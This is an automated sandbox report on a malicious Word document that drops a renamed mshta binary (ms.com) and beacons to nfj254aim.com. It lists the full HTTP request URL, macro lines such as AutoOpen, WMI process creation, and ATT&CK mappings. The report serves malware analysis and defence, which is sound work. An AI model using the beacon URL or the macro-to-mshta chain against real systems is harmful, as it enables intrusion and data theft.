Play interactive tour

Edit tour

Analysis Report documenti 12.01.20.doc

Overview

General Information

Sample Name:	documenti 12.01.20.doc
Analysis ID:	326338
MD5:	f530de77053a5c25a94f930bb954bcf8
SHA1:	46cbf6e7a7ad04e3586c88a7a0d2cbcb141c3ec4
SHA256:	1e70cc7a76bf59a5b559e496a0e83f91e13526533c89f001619ca70324ebfd82
Most interesting Screenshot:

Detection

Score:	76
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Document exploit detected (drops PE files)

Multi AV Scanner detection for submitted file

Creates processes via WMI

Drops PE files to the user root directory

Drops PE files with a suspicious file extension

Machine Learning detection for sample

Office process drops PE file

Allocates memory with a write watch (potentially for evading sandboxes)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains an embedded VBA macro which executes code when the document is opened / closed

Document contains an embedded VBA macro which reads document properties (may be used for disguise)

Document contains embedded VBA macros

Document contains no OLE stream with summary information

Document has an unknown application name

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the user directory

May sleep (evasive loops) to hinder dynamic analysis

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Searches for the Microsoft Outlook file path

Uses a known web browser user agent for HTTP communication

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2364 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

ms.com (PID: 1276 cmdline: C:\users\public\ms.com C:\users\public\ms.html MD5: 95828D670CFD3B16EE188168E083C3C5)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: documenti 12.01.20.doc

Virustotal: Detection: 29%

Perma Link

Machine Learning detection for sample

Show sources

Source: documenti 12.01.20.doc

Joe Sandbox ML: detected

Software Vulnerabilities:

Document exploit detected (drops PE files)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: ms.com.0.dr

Jump to dropped file

Source: global traffic

DNS query: name: nfj254aim.com

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 104.28.7.227:80

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 104.28.7.227:80

Source: global traffic

HTTP traffic detected: GET /analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: nfj254aim.comConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4C07723-97C0-4A14-814E-1968BCE52029}.tmp

Jump to behavior

Source: global traffic

Source: ms.com, 00000002.00000002.2342871603.0000000005417000.00000004.00000001.sdmp	String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com) equals www.linkedin.com (Linkedin)
Source: ms.com, 00000002.00000002.2340538366.0000000003100000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: ms.com, 00000002.00000002.2342871603.0000000005417000.00000004.00000001.sdmp	String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)

Source: unknown

DNS traffic detected: queries for: nfj254aim.com

Source: ms.com, 00000002.00000002.2340538366.0000000003100000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: ms.com, 00000002.00000002.2340538366.0000000003100000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: ms.com, 00000002.00000002.2340764812.00000000032E7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: ms.com, 00000002.00000002.2340764812.00000000032E7000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: ms.com, 00000002.00000003.2087841762.0000000002CD8000.00000004.00000001.sdmp	String found in binary or memory: http://nfj254aim.com/analytics/0
Source: ms.com, 00000002.00000002.2339235890.000000000057E000.00000004.00000020.sdmp, ms.com, 00000002.00000002.2342286251.00000000042E0000.00000004.00000040.sdmp	String found in binary or memory: http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rw
Source: ms.com, 00000002.00000002.2341187332.0000000003A90000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: ms.com, 00000002.00000002.2340764812.00000000032E7000.00000002.00000001.sdmp	String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: ms.com, 00000002.00000002.2340764812.00000000032E7000.00000002.00000001.sdmp	String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: ms.com, 00000002.00000002.2341187332.0000000003A90000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: ms.com, 00000002.00000002.2340538366.0000000003100000.00000002.00000001.sdmp	String found in binary or memory: http://www.hotmail.com/oe
Source: ms.com, 00000002.00000002.2340764812.00000000032E7000.00000002.00000001.sdmp	String found in binary or memory: http://www.icra.org/vocabulary/.
Source: ms.com, 00000002.00000002.2340538366.0000000003100000.00000002.00000001.sdmp	String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: ms.com, 00000002.00000002.2340538366.0000000003100000.00000002.00000001.sdmp	String found in binary or memory: http://www.windows.com/pctv.

Source: C:\Users\Public\ms.com

Window created: window name: CLIPBRDWNDCLASS

System Summary:

Office process drops PE file

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Source: C:\Users\Public\ms.com	Code function: 2_2_000000013FEA1238
Source: C:\Users\Public\ms.com	Code function: 2_2_02F40216

Source: documenti 12.01.20.doc

OLE, VBA macro line: Sub AutoOpen()

Source: documenti 12.01.20.doc

OLE, VBA macro line: a8qpd = activedocument.builtindocumentproperties(afav8)

Source: documenti 12.01.20.doc

OLE indicator, VBA macros: true

Source: documenti 12.01.20.doc

OLE indicator has summary info: false

Source: documenti 12.01.20.doc

OLE indicator application name: unknown

Source: Joe Sandbox View

Dropped File: C:\Users\Public\ms.com 8C10AE4BE93834A4C744F27CA79736D9123ED9B0D180DB28556D2D002545BAF2

Source: C:\Users\Public\ms.com

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: ms.com, 00000002.00000002.2340538366.0000000003100000.00000002.00000001.sdmp

Binary or memory string: .VBPud<_

Source: classification engine

Classification label: mal76.expl.winDOC@2/13@2/1

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$cumenti 12.01.20.doc

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRC254.tmp

Jump to behavior

Source: documenti 12.01.20.doc	OLE document summary: title field not present or empty
Source: documenti 12.01.20.doc	OLE document summary: author field not present or empty
Source: documenti 12.01.20.doc	OLE document summary: edited time not present or 0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::create

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\ms.com

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Source: C:\Users\Public\ms.com	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\Public\ms.com	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: documenti 12.01.20.doc

Virustotal: Detection: 29%

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown	Process created: C:\Users\Public\ms.com C:\users\public\ms.com C:\users\public\ms.html

Source: C:\Users\Public\ms.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Source: C:\Users\Public\ms.com

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source:	Binary string: mshta.pdbH source: ms.com, 00000002.00000002.2351291450.000000013FEA1000.00000020.00020000.sdmp, ms.com.0.dr
Source:	Binary string: wshom.pdb source: ms.com, 00000002.00000002.2339981194.0000000002A50000.00000002.00000001.sdmp
Source:	Binary string: mshta.pdb source: ms.com, ms.com.0.dr

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::create

Drops PE files with a suspicious file extension

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\Public\ms.com	Process information set: NOOPENFILEERRORBOX

Source: C:\Users\Public\ms.com	Memory allocated: 2370000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\Public\ms.com	Memory allocated: 2550000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\Public\ms.com	Memory allocated: 2590000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\Public\ms.com	Memory allocated: 2920000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\Public\ms.com	Memory allocated: 2A70000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\Public\ms.com	Memory allocated: 2AE0000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\Public\ms.com	Memory allocated: 2B20000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\Public\ms.com	Memory allocated: 2CC0000 memory commit \| memory reserve \| memory write watch
Source: C:\Users\Public\ms.com	Memory allocated: 2F60000 memory commit \| memory reserve \| memory write watch

Source: C:\Users\Public\ms.com TID: 2492

Thread sleep time: -120000s >= -30000s

Source: C:\Users\Public\ms.com	Code function: 2_2_000000013FEA1944 SetUnhandledExceptionFilter,
Source: C:\Users\Public\ms.com	Code function: 2_2_000000013FEA1C04 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,TerminateProcess,
Source: C:\Users\Public\ms.com	Code function: 2_2_000000013FEA40A0 SetUnhandledExceptionFilter,

Source: ms.com, 00000002.00000002.2339281198.0000000000DA0000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: ms.com, 00000002.00000002.2339281198.0000000000DA0000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: ms.com, 00000002.00000002.2339281198.0000000000DA0000.00000002.00000001.sdmp	Binary or memory string: !Progman

Source: C:\Users\Public\ms.com

Code function: 2_2_000000013FEA1B14 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,

Source: C:\Users\Public\ms.com

Code function: 2_2_000000013FEA1238 rand_s,VirtualAlloc,GetVersion,GetModuleHandleW,GetProcAddress,??2@YAPEAX_K@Z,??2@YAPEAX_K@Z,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,??3@YAXPEAX@Z,??3@YAXPEAX@Z,RegCloseKey,GetModuleHandleW,GetProcAddress,??2@YAPEAX_K@Z,MultiByteToWideChar,UnregisterApplicationRestart,??3@YAXPEAX@Z,GetProcAddress,FreeLibrary,??3@YAXPEAX@Z,??3@YAXPEAX@Z,RegCloseKey,

Source: C:\Users\Public\ms.com

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	Path Interception	Process Injection2	Masquerading211	OS Credential Dumping	System Time Discovery1	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scripting2	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Virtualization/Sandbox Evasion2	LSASS Memory	Virtualization/Sandbox Evasion2	Remote Desktop Protocol	Archive Collected Data1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution13	Logon Script (Windows)	Logon Script (Windows)	Process Injection2	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Scripting2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Information Discovery7	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
documenti 12.01.20.doc	29%	Virustotal		Browse
documenti 12.01.20.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\ms.com	0%	Metadefender		Browse
C:\Users\Public\ms.com	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://nfj254aim.com/analytics/0	0%	Avira URL Cloud	safe
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rw	0%	Avira URL Cloud	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nfj254aim.com	104.28.7.227	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	ms.com, 00000002.00000002.2340764812.00000000032E7000.00000002.00000001.sdmp	false		high
http://www.windows.com/pctv.	ms.com, 00000002.00000002.2340538366.0000000003100000.00000002.00000001.sdmp	false		high
